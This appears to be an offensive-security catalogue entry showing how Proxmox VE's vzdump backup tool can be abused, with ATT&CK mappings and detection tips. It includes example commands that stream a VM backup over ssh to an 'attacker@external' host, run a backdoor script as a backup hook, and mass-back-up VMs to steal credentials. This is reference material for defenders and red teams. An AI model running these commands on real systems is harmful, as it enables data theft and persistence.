.. /vzdump

Star

vzdump is the Proxmox VE backup utility for creating VM and container backups. It supports multiple backup modes and compression algorithms. Adversaries can abuse vzdump to create full VM snapshots for offline credential extraction, encrypt backups for ransomware operations, or exfiltrate entire VM images.

Paths

• /usr/bin/vzdump
• /usr/sbin/qmrestore
• /usr/sbin/pct

Resources

• https://pve.proxmox.com/pve-docs/vzdump.1.html
• https://pve.proxmox.com/wiki/Backup_and_Restore

Detection

• Monitor /var/log/pve/tasks/* for backup operations
• Watch for backups to non-standard locations
• Alert on --all backup operations during unusual hours

Acknowledgements

• ZephrFish

Collection

1. Create a backup of a VM or container.

   vzdump {vmid}

   Use Case Create full VM backups for offline analysis, credential extraction, or exfiltration.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • vzdump 100

   • vzdump 100 --mode snapshot --compress zstd

   • vzdump 100 --storage local --mode stop

   ATT&CK Technique T1005

2. Backup all VMs and containers on the node.

   vzdump --all

   Use Case Mass backup of all VMs for comprehensive data theft or ransomware staging.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • vzdump --all --mode snapshot

   • vzdump --all --compress none --dumpdir /mnt/fast-backup

   ATT&CK Technique T1005

Exfiltration

1. Create a live snapshot backup to a specific directory.

   vzdump {vmid} --mode snapshot --dumpdir /path

   Use Case Backup VMs to attacker-controlled storage for exfiltration.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • vzdump 100 --mode snapshot --dumpdir /mnt/exfil

   • vzdump 100 --stdout | ssh attacker@external "cat > backup.vma"

   ATT&CK Technique T1567

Execution

1. Execute a custom script during backup phases (pre, post).

   vzdump {vmid} --script /path/to/script

   Use Case Execute arbitrary code during backup operations for persistence or lateral movement.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • vzdump 100 --script /tmp/backdoor.sh

   ATT&CK Technique T1059

Persistence

1. Restore a VM from a vzdump backup.

   qmrestore {backup.vma} {vmid}

   Use Case Restore VMs from backups containing older vulnerable configurations or known credentials.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1078

2. Restore a container from a vzdump backup.

   pct restore {ctid} {backup.tar} --storage local

   Use Case Restore containers from backups to access older credentials or configurations.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1078